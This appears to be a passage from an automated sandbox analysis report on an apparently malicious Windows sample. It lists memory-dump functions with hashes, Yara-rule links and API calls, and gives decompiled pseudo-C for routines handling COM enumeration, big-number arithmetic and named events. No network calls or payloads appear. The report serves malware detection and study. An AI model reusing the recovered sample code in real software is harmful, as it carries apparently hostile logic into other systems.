Opcode Fuzzy Hash: 36afb094fbf91bde458c9f04504b5550f94f71234a4dc47069f13a2b3c191332
Instruction Fuzzy Hash: 5F41BC70E04219EBCB14DF68D8447AEBB71FB40318F20C66AE8251B3D0D3799990CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0042C380, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 107COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0042C3FA
__aullrem.LIBCMT ref: 0042C5CA
__aulldiv.LIBCMT ref: 0042C5EC

Strings

9, xrefs: 0042C5FD

Memory Dump Source

Source File: 00000000.00000002.516842254.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: 9
API String ID: 3120068967-2366072709
Opcode ID: 847f5d783817a64a465974e632cf6f5caf82a10921107752677570f2b7e61ad4
Instruction ID: 93ae6df97081ab973bd57012a17e3c9f2b16cea77e281a17795a5f4179266ed4
Opcode Fuzzy Hash: 847f5d783817a64a465974e632cf6f5caf82a10921107752677570f2b7e61ad4
Instruction Fuzzy Hash: BA4106B1E10139AFDB24CF48D881BAEB7B5FF85314F50459AE149A7241C778AE81CF4A

Uniqueness

Uniqueness Score: -1.00%

Function 0042C3CE, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0042C3FA
__aullrem.LIBCMT ref: 0042C5CA
__aulldiv.LIBCMT ref: 0042C5EC

Strings

9, xrefs: 0042C5FD

Memory Dump Source

Source File: 00000000.00000002.516842254.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: 9
API String ID: 3120068967-2366072709
Opcode ID: 9f8bf37166e393c87952b46ab01db12bff4d9369821a492f8aa85efb0c424c87
Instruction ID: 3d0ed4706c371bf06ce17a7be2a59044c4cb58c3c03d10ca71e3c15361b56772
Opcode Fuzzy Hash: 9f8bf37166e393c87952b46ab01db12bff4d9369821a492f8aa85efb0c424c87
Instruction Fuzzy Hash: 564106B1A40139AFDB24CF48DC81BAEB7B5FF85314F5045A9E149A7241C738AE81CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0042A786, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0042A7B2
__aullrem.LIBCMT ref: 0042A97F
__aulldiv.LIBCMT ref: 0042A9A1

Strings

9, xrefs: 0042A9B2

Memory Dump Source

Source File: 00000000.00000002.516842254.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: 9
API String ID: 3120068967-2366072709
Opcode ID: 9c292ae1dbd51e7e4058b7c24572866a36c0beac325e28ac9a73a2ffc7614e33
Instruction ID: e57f435666001b5652911f6cbb4b857eec781b637c588f78706546b15b8dd92d
Opcode Fuzzy Hash: 9c292ae1dbd51e7e4058b7c24572866a36c0beac325e28ac9a73a2ffc7614e33
Instruction Fuzzy Hash: 974104B1E01628DFEB24CF49DC89BAEB7B5FB84300F50859AD449A7240D7389E91CF46

Uniqueness

Uniqueness Score: -1.00%

Function 0042C377, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0042C3FA
_get_int64_arg.LIBCMTD ref: 0042C422
__aullrem.LIBCMT ref: 0042C5CA
__aulldiv.LIBCMT ref: 0042C5EC

Strings

9, xrefs: 0042C5FD

Memory Dump Source

Source File: 00000000.00000002.516842254.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: _get_int64_arg$__aulldiv__aullrem
String ID: 9
API String ID: 2124759748-2366072709
Opcode ID: 4714ab5dc69ee6a295baf986a80ddc020e31d4475cbc20599db88215d06293b4
Instruction ID: 2297e37cc67e4b36ebbb556d3833eec11444ad6f5d86195b2b03ef9234c51426
Opcode Fuzzy Hash: 4714ab5dc69ee6a295baf986a80ddc020e31d4475cbc20599db88215d06293b4
Instruction Fuzzy Hash: BF4105B1A40139AFDB24CF48DD81BAEB7B5BF85314F5041EAE149A7201C778AE81CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0042A735, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0042A7B2
_get_int64_arg.LIBCMTD ref: 0042A7DA
__aullrem.LIBCMT ref: 0042A97F
__aulldiv.LIBCMT ref: 0042A9A1

Strings

9, xrefs: 0042A9B2

Memory Dump Source

Source File: 00000000.00000002.516842254.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: _get_int64_arg$__aulldiv__aullrem
String ID: 9
API String ID: 2124759748-2366072709
Opcode ID: 6362fca3f0a21a2c4d3e1b3d5fad6faee9cde59bbf2a382a04e27ce78b305104
Instruction ID: c7cf1c735397d643a3172558626ca03ec8bb2827c24f8d3bf67085c61ddd54aa
Opcode Fuzzy Hash: 6362fca3f0a21a2c4d3e1b3d5fad6faee9cde59bbf2a382a04e27ce78b305104
Instruction Fuzzy Hash: 084105B1E01628DFDB24DF49D889BAEB7B5FB44304F6085DAD449A7240D7389E91CF06

Uniqueness

Uniqueness Score: -1.00%

Function 004262B3, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00426304
__invalid_parameter.LIBCMTD ref: 0042639D
_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 004263AF

Strings

u!h8d@, xrefs: 00426353

Memory Dump Source

Source File: 00000000.00000002.516842254.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: Locale$UpdateUpdate::~___invalid_parameter_memset
String ID: u!h8d@
API String ID: 255745848-3039543186
Opcode ID: 2b49365f5bff4aac0e7ca6481663ff2a9a328998f6363769a4adc87676ce7d20
Instruction ID: f6f108dee149a29f77010d2945d36e7fc3e587d2ebcd330e961a9936728bb217
Opcode Fuzzy Hash: 2b49365f5bff4aac0e7ca6481663ff2a9a328998f6363769a4adc87676ce7d20
Instruction Fuzzy Hash: 9C31AE30A00218DBCB24DF58D842BEE7370BB04304F61862EFC26272D0D7B9A895CB99

Uniqueness

Uniqueness Score: -1.00%

Function 03C4137B, Relevance: 6.2, APIs: 4, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 03C413B6
SysFreeString.OLEAUT32(00000000), ref: 03C4149B

Part of subcall function 03C44E05: SysAllocString.OLEAUT32(03C4C290), ref: 03C44E55

SafeArrayDestroy.OLEAUT32(00000000), ref: 03C414EE
SysFreeString.OLEAUT32(00000000), ref: 03C414FD

Part of subcall function 03C452B9: Sleep.KERNEL32(000001F4), ref: 03C45301

Memory Dump Source

Source File: 00000000.00000002.517980109.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.517970784.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.517994997.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.518001499.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.518009139.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: String$AllocFree$ArrayDestroySafeSleep
String ID:
API String ID: 3193056040-0
Opcode ID: b3af286c46d784f072d8e6ddae884c7eb8d3369377d6f7bca17c5f6a79c0f8c0
Instruction ID: ce3dfd1cca9d1b90625fb85f5966a71f7b32dbc49e4f69f10e8c239f44a6cd18
Opcode Fuzzy Hash: b3af286c46d784f072d8e6ddae884c7eb8d3369377d6f7bca17c5f6a79c0f8c0
Instruction Fuzzy Hash: 48516039900609EFDB11DFA8D844A9EF7B6FF88710F198469E949EB220DB31ED45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 03C44E05, Relevance: 6.2, APIs: 4, Instructions: 154
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E03C44E05(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				short _t67;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr* _t83;
				intOrPtr* _t87;
				intOrPtr _t103;
				intOrPtr _t109;
				void* _t118;
				void* _t122;
				void* _t123;
				intOrPtr _t130;

				_t123 = _t122 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t118 >= 0) {
					_t54 = _v8;
					_t103 =  *0x3c4d2a8; // 0xb0a5a8
					_t5 = _t103 + 0x3c4e038; // 0x3050f485
					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t118 >= 0) {
						__imp__#2(0x3c4c290);
						_v28 = _t57;
						if(_t57 == 0) {
							_t118 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t87 = __imp__#6;
							_t118 = _t61;
							if(_t118 >= 0) {
								_t63 = _v24;
								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t118 >= 0) {
									_t130 = _v20;
									if(_t130 != 0) {
										_t67 = 3;
										_v64 = _t67;
										_v48 = _t67;
										_v56 = 0;
										_v40 = 0;
										if(_t130 > 0) {
											while(1) {
												_t68 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t123 = _t123;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
												if(_t118 < 0) {
													goto L16;
												}
												_t70 = _v8;
												_t109 =  *0x3c4d2a8; // 0xb0a5a8
												_t28 = _t109 + 0x3c4e0bc; // 0x3050f1ff
												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
												if(_t118 >= 0) {
													_t75 = _v16;
													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
													if(_t118 >= 0 && _v12 != 0) {
														_t79 =  *0x3c4d2a8; // 0xb0a5a8
														_t33 = _t79 + 0x3c4e078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t83 = _v16;
															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
														}
														 *_t87(_v12);
													}
													_t77 = _v16;
													 *((intOrPtr*)( *_t77 + 8))(_t77);
												}
												_t72 = _v8;
												 *((intOrPtr*)( *_t72 + 8))(_t72);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t87(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t118;
			}

0x03c44e0a
0x03c44e13
0x03c44e14
0x03c44e18
0x03c44e1e
0x03c44e24
0x03c44e2d
0x03c44e33
0x03c44e3d
0x03c44e3f
0x03c44e45
0x03c44e4a
0x03c44e55
0x03c44e5b
0x03c44e60
0x03c44f82
0x03c44e66
0x03c44e66
0x03c44e73
0x03c44e79
0x03c44e7f
0x03c44e83
0x03c44e89
0x03c44e96
0x03c44e9a
0x03c44ea0
0x03c44ea3
0x03c44eab
0x03c44eac
0x03c44eb0
0x03c44eb4
0x03c44eb7
0x03c44eba
0x03c44ec0
0x03c44ec9
0x03c44ecf
0x03c44ed0
0x03c44ed3
0x03c44ed4
0x03c44ed5
0x03c44edd
0x03c44ede
0x03c44edf
0x03c44ee1
0x03c44ee5
0x03c44ee9
0x00000000
0x00000000
0x03c44eef
0x03c44ef8
0x03c44efe
0x03c44f08
0x03c44f0c
0x03c44f0e
0x03c44f1b
0x03c44f1f
0x03c44f27
0x03c44f2c
0x03c44f3e
0x03c44f40
0x03c44f46
0x03c44f46
0x03c44f4f
0x03c44f4f
0x03c44f51
0x03c44f57
0x03c44f57
0x03c44f5a
0x03c44f60
0x03c44f63
0x03c44f6c
0x00000000
0x00000000
0x00000000
0x03c44f6c
0x03c44ec0
0x03c44eba
0x03c44ea3
0x03c44f72
0x03c44f72
0x03c44f78
0x03c44f78
0x03c44f7e
0x03c44f7e
0x03c44f87
0x03c44f8d
0x03c44f8d
0x03c44e4a
0x03c44f96

APIs

SysAllocString.OLEAUT32(03C4C290), ref: 03C44E55
lstrcmpW.KERNEL32(00000000,0076006F), ref: 03C44F36
SysFreeString.OLEAUT32(00000000), ref: 03C44F4F
SysFreeString.OLEAUT32(?), ref: 03C44F7E

Memory Dump Source

Source File: 00000000.00000002.517980109.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.517970784.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.517994997.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.518001499.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.518009139.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Free$Alloclstrcmp
String ID:
API String ID: 1885612795-0
Opcode ID: 545da1e8ef29653c4e1aa648466330e0e9cfdd34f6253e3ac7c0a0431809e5e4
Instruction ID: 0140c9877511b06e9db94aace90a3192b42a570894a7fccb8225b8498bc0a2f0
Opcode Fuzzy Hash: 545da1e8ef29653c4e1aa648466330e0e9cfdd34f6253e3ac7c0a0431809e5e4
Instruction Fuzzy Hash: 96515075D00609EFDB14DFE8C8889AEF7B9FF88704B254594E915EB224D731AD41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 03C429ED, Relevance: 6.1, APIs: 4, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E03C429ED(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v92;
				void _v236;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E03C48B37(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E03C44AA4(_t79,  &_v236);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E03C42F01(_t101,  &_v236, _a8, _t96 - _t81);
					E03C42F01(_t79,  &_v92, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
					_t66 = E03C44AA4(_t101, 0x3c4d1b0);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E03C44AA4(_a16, _a4);
						E03C428BA(_t79,  &_v236, _a4, _t97);
						memset( &_v236, 0, 0x8c);
						_t55 = memset( &_v92, 0, 0x44);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L03C4AF6E();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L03C4AF68();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0xe8;
						_a12 = _t74;
						_t76 = E03C49947(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v92;
							if(E03C44506(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E03C4A708(_t79,  &_v92, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0x3c4d1b0 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}

0x03c429f0
0x03c429fc
0x03c42a02
0x03c42a07
0x03c42a0b
0x03c42b68
0x03c42b6c
0x03c42b6c
0x03c42a11
0x03c42a15
0x03c42a19
0x03c42a1c
0x03c42a27
0x03c42a2d
0x03c42a32
0x03c42a35
0x03c42a4f
0x03c42a5b
0x03c42a64
0x03c42a6e
0x03c42a73
0x03c42a75
0x03c42a78
0x03c42b26
0x03c42b2c
0x03c42b3d
0x03c42b50
0x03c42b60
0x00000000
0x03c42b65
0x03c42a81
0x03c42a88
0x03c42a8c
0x03c42a92
0x03c42a94
0x03c42a96
0x03c42a98
0x03c42a9a
0x03c42aa4
0x03c42aa9
0x03c42aab
0x03c42aad
0x03c42aae
0x03c42aaf
0x03c42ab0
0x03c42ab7
0x03c42abe
0x03c42ac1
0x03c42ac1
0x03c42a8e
0x03c42a8e
0x03c42a8e
0x03c42ac9
0x03c42ad1
0x03c42ada
0x03c42adf
0x03c42adf
0x03c42ae4
0x00000000
0x00000000
0x03c42ae6
0x03c42ae9
0x03c42af3
0x00000000
0x00000000
0x03c42af5
0x03c42af5
0x03c42aff
0x03c42adf
0x03c42ae4
0x00000000
0x00000000
0x00000000
0x03c42ae4
0x03c42b09
0x03c42b0c
0x03c42b0f
0x03c42b16
0x03c42b16
0x03c42b23
0x00000000
0x03c42b23
0x03c42a1e
0x03c42a22
0x03c42a23
0x03c42a25
0x00000000
0x00000000
0x00000000
0x03c42a25
0x00000000

APIs

_allmul.NTDLL(?,00000000,00000000,00000001), ref: 03C42A9A
_aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 03C42AB0
memset.NTDLL ref: 03C42B50
memset.NTDLL ref: 03C42B60

Memory Dump Source

Source File: 00000000.00000002.517980109.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.517970784.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.517994997.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.518001499.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.518009139.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$_allmul_aulldiv
String ID:
API String ID: 3041852380-0
Opcode ID: 4b10f2855068d6d45f4bc8ebcafafa982447c855a8edf4ff3b88ecc66d56ba3c
Instruction ID: 7f7a7585a988e07712b758fe50748d8f0bbbb1ad1345910e2e3a75f8bdd8e98d
Opcode Fuzzy Hash: 4b10f2855068d6d45f4bc8ebcafafa982447c855a8edf4ff3b88ecc66d56ba3c
Instruction Fuzzy Hash: 4041B135A00309ABDB20DFA9CC81BEEB779EF44310F118929FD16EB180DB709A45DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00418587, Relevance: 6.1, APIs: 4, Instructions: 100COMMON

Download Yara Rule

APIs

__initterm.LIBCMTD ref: 0041867A
__initterm.LIBCMTD ref: 0041868C
__CrtSetDbgFlag.LIBCMTD ref: 0041869F
___freeCrtMemory.LIBCMTD ref: 004186B6

Part of subcall function 0041B970: RtlEncodePointer.NTDLL(00000000,?,004187BB,?,?,0041BAE0), ref: 0041B977

Memory Dump Source

Source File: 00000000.00000002.516842254.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: __initterm$EncodeFlagMemoryPointer___free
String ID:
API String ID: 2654307729-0
Opcode ID: afd26c273414e354559f507ae7c0d4fcd32bf26312156c9418179bd23470b913
Instruction ID: 18e61a187dbdae496a29abc73b09b63386075cb74fcf53569c43cbcb3c618095
Opcode Fuzzy Hash: afd26c273414e354559f507ae7c0d4fcd32bf26312156c9418179bd23470b913
Instruction Fuzzy Hash: 7441C575D00208DFDB14DFA4D985ADEBBB1FB48314F24422EE811B63A0DB395881CF69

Uniqueness

Uniqueness Score: -1.00%

Function 01FE16FD, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?), ref: 01FE1753
memcpy.NTDLL(?,?,?,?,?,?), ref: 01FE17EE
VirtualFree.KERNEL32(?,00000000,00008000,?,?,?), ref: 01FE1809

Strings

Sep 21 2021, xrefs: 01FE178A

Memory Dump Source

Source File: 00000000.00000002.517164137.0000000001FE0000.00000040.00000001.sdmp, Offset: 01FE0000, based on PE: false

Similarity

API ID: Virtual$AllocFreememcpy
String ID: Sep 21 2021
API String ID: 4010158826-1195158264
Opcode ID: aba4b32efa5e837b3045afe91a06ba53ca63f7fe840b2a5a7f16436e38900d85
Instruction ID: f4ce318e489b8702f27d2c2e07373cca4d0cd59a03f9d83d5a210c9286229eb1
Opcode Fuzzy Hash: aba4b32efa5e837b3045afe91a06ba53ca63f7fe840b2a5a7f16436e38900d85
Instruction Fuzzy Hash: 6B313076D0021ADBDB01CF99DD85BEEBBB8FF08704F104165EA05BB280D772AA05CB94

Uniqueness

Uniqueness Score: -1.00%

Function 03C46150, Relevance: 6.1, APIs: 4, Instructions: 96
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E03C46150(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				short* _t19;
				void* _t25;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0x3c4d270; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0x3c4d2a8; // 0xb0a5a8
				_t3 = _t8 + 0x3c4e87e; // 0x61636f4c
				_t25 = 0;
				_t30 = E03C410B1(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x3c4d2ac, 1, 0, _t30);
					E03C48B22(_t30);
				}
				_t12 =  *0x3c4d25c; // 0x2000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E03C48F1B() != 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t31 = E03C43485(_t32, 0);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t19 =  *0x3c4d10c( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 = _t19 + 2;
					}
					_t31 = E03C48B7B(0,  *_t32, _t19, 0);
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}

0x03c46151
0x03c46158
0x03c46162
0x03c46166
0x03c4616c
0x03c4617b
0x03c46182
0x03c46186
0x03c46198
0x03c4619a
0x03c4619a
0x03c4619f
0x03c461a6
0x03c461fd
0x03c461fd
0x03c46203
0x03c46205
0x03c46205
0x03c4620f
0x03c46213
0x03c46225
0x03c46225
0x03c46229
0x03c4622f
0x03c4622f
0x00000000
0x03c461bf
0x03c461c4
0x03c461cc
0x03c461d0
0x03c461d4
0x03c461d4
0x03c461e1
0x03c461e5
0x03c461e9
0x03c4623e
0x03c46244
0x03c46244
0x03c461f7
0x03c461fb
0x03c46232
0x03c46234
0x03c46237
0x03c46237
0x00000000
0x03c46234
0x03c461fb
0x00000000
0x03c461e5

APIs

Part of subcall function 03C410B1: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,04759C18,00000000,?,?,69B25F44,00000005,03C4D00C,?,?,03C430FE), ref: 03C410E7
Part of subcall function 03C410B1: lstrcpy.KERNEL32(00000000,00000000), ref: 03C4110B
Part of subcall function 03C410B1: lstrcat.KERNEL32(00000000,00000000), ref: 03C41113

CreateEventA.KERNEL32(03C4D2AC,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,03C4991F,?,00000001,?), ref: 03C46191

Part of subcall function 03C48B22: RtlFreeHeap.NTDLL(00000000,00000000,03C4131A,00000000,?,?,00000000), ref: 03C48B2E

WaitForSingleObject.KERNEL32(00000000,00004E20,03C4991F,00000000,00000000,?,00000000,?,03C4991F,?,00000001,?,?,?,?,03C47D37), ref: 03C461F1
WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,03C4991F,?,00000001,?), ref: 03C4621F
CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,03C4991F,?,00000001,?,?,?,?,03C47D37), ref: 03C46237

Memory Dump Source

Source File: 00000000.00000002.517980109.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.517970784.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.517994997.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.518001499.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.518009139.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
String ID:
API String ID: 73268831-0
Opcode ID: 72edbf5dcdd10204cbb0e1608cdd68e71249efbcaf9fcd7b9bb69fafee584811
Instruction ID: 766a4d78d09af8e85f814c524778ae33c0b6d3c88d580a1a9c702dc1a6eca8ed
Opcode Fuzzy Hash: 72edbf5dcdd10204cbb0e1608cdd68e71249efbcaf9fcd7b9bb69fafee584811
Instruction Fuzzy Hash: 96212636A013116BC731EE789C48B6BB399EB8AB10F0A0625FD86DF10DDB36ED518640

Uniqueness

Uniqueness Score: -1.00%

Function 03C49870, Relevance: 6.1, APIs: 4, Instructions: 87
sleepCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E03C49870(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E03C42931(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t16 =  &(_t39[1]); // 0x5
						_t23 = _t16;
						if( *_t16 != 0) {
							E03C48DAB(_t23);
						}
					}
					return _t38;
				}
				if(E03C4155A(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x3c4d2ac, 1, 0,  *0x3c4d344);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E03C45BC0(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E03C44B2A(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E03C44FF0(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E03C46150( &_v32, _t39);
					goto L13;
				}
			}

0x03c49870
0x03c4987d
0x03c49883
0x03c49884
0x03c49885
0x03c49886
0x03c49887
0x03c4988b
0x03c49897
0x03c4989b
0x03c49923
0x03c49923
0x03c49926
0x03c49928
0x03c49930
0x03c49930
0x03c49936
0x03c49939
0x03c49939
0x03c49936
0x03c49944
0x03c49944
0x03c498ae
0x03c498b0
0x03c498b0
0x03c498c7
0x03c498cb
0x03c498ce
0x03c498d9
0x03c498e0
0x03c498e0
0x03c498e9
0x03c498ed
0x03c498fb
0x03c498ef
0x03c498ef
0x03c498f0
0x03c498f1
0x03c498f2
0x03c498f3
0x03c498f4
0x03c498f4
0x03c49900
0x03c49903
0x03c49907
0x03c49909
0x03c49909
0x03c49910
0x00000000
0x03c49912
0x03c49912
0x03c4991f
0x00000000
0x03c4991f

APIs

CreateEventA.KERNEL32(03C4D2AC,00000001,00000000,00000040,00000001,?,7519F710,00000000,7519F730,?,?,?,03C47D37,?,00000001,?), ref: 03C498C1
